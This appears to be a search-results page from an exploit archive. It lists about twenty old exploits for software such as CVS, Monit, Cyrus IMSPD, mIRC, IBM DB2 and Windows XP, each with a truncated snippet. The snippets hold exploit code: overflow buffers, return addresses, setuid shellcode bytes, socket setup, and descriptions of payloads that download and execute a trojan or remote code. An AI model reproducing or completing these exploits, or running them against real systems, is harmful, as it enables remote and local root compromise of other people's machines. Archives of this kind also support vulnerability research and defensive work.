200 matches found
CVS - Remote Entry Line Root Heap Overflow
include include include include include include include include include include include include include include define CVSPORT 2401 define RET 0xffbffd20 define NOP 0x82102017 define ROUNDs if s % wordsize s += wordsize - s % wordsize unsigned char root; unsigned char user; unsigned char pass;...
Monit 4.1 - Remote Buffer Overflow
!/usr/bin/perl monit \n\n"; exit0; print "HOST:\t$ARGV0\n"; print "PORT:\t2812\n"; my $buffer = "B" x 284 . "\xcf\x89\xb3\x40" . $shellcode; esp mandrake 9.1 my $buffer = "A" x 284 . "XXXX" . "B" x 100; dos and debug print "connecting to server...\n"; $socket = IO::Socket::INET - new PeerAddr =...
PSOProxy 0.91 (Windows 2000XP) - Remote Buffer Overflow
PSOProxy 0.91 Windows 2000XP - Remote Buffer Overflow / Copyright © Rosiello Security http www rosiello org ================ -== Remote Exploit for PSOProxy version v0.91 ==-- Code by: rave Contact: [email protected] Date: Feb 2004 Bug found by: Donato Ferrante There is a vulnerability found in t...
Xsok v1.02 "-xsokdir" local buffer overflow game exploit
No description provided by source. / 0x333xsok 2 = xsok 1.02 local game exploit Happy new year ! 2 : coded by c0wboy c 0x333 Outsiders Security Labs / www.0x333.org / include stdio.h include unistd.h define BIN "/usr/games/xsok" define RETADD 0xbffffa3c define SIZE 200 unsigned char shellcode = /...
XSOK 1.0 2 - 'LANG Environment' Local Buffer Overrun
// source: https://www.securityfocus.com/bid/9341/info xsok is prone to a locally exploitable buffer overrun vulnerability due to insufficient bounds check of data supplied through the LANG environment variable. This could be exploited to execute arbitrary code with elevated privileges. The progr...
Cyrus IMSPD v1.7 abook_dbname Remote Root Exploit
Exploit for linux platform in category remote exploits ================================================= Cyrus IMSPD v1.7 abook_dbname Remote Root Exploit ================================================= / Cyrus IMSPD Remote Root Exploit ------------------------------- Bug found by: Felix Lindner...
Cyrus IMSPD 1.7 - abook_dbname Remote Code Execution
/ Cyrus IMSPD Remote Root Exploit ------------------------------- Bug found by: Felix Lindner Exploit coded by: SpikE Exploitation technique: As said by Felix Lindner, the bug lies in the "abook_dbname" function. To cause the overrun, we must ca...
Eznet 3.5.0 - Remote Stack Overflow Denial of Service
!/usr/bin/perl -w Stack Overflow in eZnet.exe - Remote Exploit Will download a trojan from any address which you provide on the target system, then will execute the trojan. For this exploit I have tried several strategies to increase reliabili...
Cyrus IMSP Daemon 1.x - Remote Buffer Overflow
// source: https://www.securityfocus.com/bid/9227/info A problem has been identified in the Cyrus IMSP Daemon implementation when handling certain types of requests. Because of this, it may be possible for a remote attacker to gain unauthorized acces...
Solaris Runtime Linker (SPARC) - 'ld.so.1' Local Buffer Overflow
/ ld.so.1 exploit SPARC coded by: osker178 bjr213 psu.edu Alright, so this exploits a fairly standard buffer overflow in the default Solaris runtime linker ld.so.1 discovery by Jouko Pynnonen Only real deviation here from the standard overflow and return into libc scenario is that at the time tha...
mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow
/ remote mirc 998 chars to someone on IRC is simply NOT done : Then I remember the iframe-irc:// flaw found by uuuppzz 2 This exploit will write a malicious HTML file containing an iframe executing the irc:// address. So you can give this to anyone on IRC for example ; The shellcode included doe...
IBM DB2 Universal Database 7.2 (db2licm) Local Exploit
Exploit for linux platform in category local exploits ====================================================== IBM DB2 Universal Database 7.2 db2licm Local Exploit ====================================================== / Local Exploit for db2licm IBM db2 v 7.1 Linux/x86 vulnerability researched by...
IBM DB2 - Universal Database 7.2 db2licm Local Overflow
/ Local Exploit for db2licm IBM db2 v 7.1 Linux/x86 vulnerability researched by Juan Manuel Pascual Escriba pask at uninet.edu / char sc= "\x31\xc0" / begin setuid 0 / "\x31\xdb" "\xb0\x17" "\xcd\x80" "\xeb\x1f" "\x5e" "\x89\x76\x08"...
xtokkaetama 1.0b Local Game Exploit (Red Hat 9.0)
Exploit for linux platform in category local exploits ================================================= xtokkaetama 1.0b Local Game Exploit Red Hat 9.0 ================================================= / xtokkaetama 1.0b local game exploit on Red Hat 9.0 Coded by brahma 31/07/2003...
Microsoft Internet Explorer - Object Tag (MS03-020)
!/usr/bin/perl Proof of concept exploit on IE 5.x - 6.x by Alumni IE-Object longtype dynamic call overflow url:// the flaw actually exists in URLMON.DLL when converting backslashes to wide char, this can be seen on stack dump near '&CLSID=AAA...2F2F...'. To exploit: i start server perl script; ii...
kon2 exploit!!
I look kon2 source and -Console arg is the problem, so here go the PoC. ----cut here-------- !/usr/bin/perl Priv8security.com kon2 version 0.3.9b-16 and local root exploit. Tested on Redhat 8.0. should work on 9.0 and 7.3 Bug happens on -Coding arg. Based on Redhat Advisory. wsxz@localhost buffer...
Microsoft Windows XP - 'explorer.exe' Local Buffer Overflow
include include include include include char shellcode= //download url and exec shellcode //doesn't have any hardcoded values //except the base address of the program //searches the import table for //LoadLibraryA, GetProcAddress and ExitProcess. //by .einstein., dH team...
MS Windows XP (explorer.exe) Buffer Overflow Exploit
Exploit for unknown platform in category local exploits ==================================================== MS Windows XP explorer.exe Buffer Overflow Exploit ==================================================== include include include include include char shellcode= //download url and exec...
GLIBC locale - Format Strings
/ su.c by xp, modified by logikal@efnet - tested on redhat 5 - 7 / include include include include include include include include char shellcode = "\x31\xc0\x83\xc0\x17\x31\xdb\xcd\x80\xeb" "\x30\x5f\x31\xc9\x88\x4f\x17\x88\x4f\x1a" "\x8d\x5f\x10\x89\x1f\x8d\x47\x18\x89\x47"...
New buffer overflow in planetDNS
hi planetdns http://www.planetdns.net is commercial software package that allows you to turn computer into an Internet server. and be able to create an Internet Name, connect to a web server, FTP, mail server, etc. running on your computer. planetdns is vulnerable has a buffer overflow with a...